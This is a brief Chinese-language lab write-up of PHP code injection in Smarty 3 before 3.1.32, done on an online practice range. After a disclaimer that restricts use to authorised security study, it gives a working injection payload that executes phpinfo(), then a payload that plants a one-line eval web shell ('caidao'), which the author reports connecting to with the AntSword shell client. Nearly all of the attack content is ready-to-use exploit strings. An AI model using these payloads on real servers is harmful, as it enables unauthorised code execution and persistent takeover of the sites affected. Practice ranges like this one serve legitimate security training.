声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
3.1.32 之前的 Smarty 3 在未清理模板名称的自定义资源上调用 fetch() 或 display() 函数时容易受到 PHP 代码注入的影响。
春秋云镜开启靶场:
http://eci-2zeew3c5wwahegjo9nay.cloudeci1.ichunqiu.com/
payload:
/index.php?eval=*/phpinfo();/*
成功执行php代码
写shell
/index.php?eval=*/@eval($_POST['caidao']);/*
蚁剑成功连接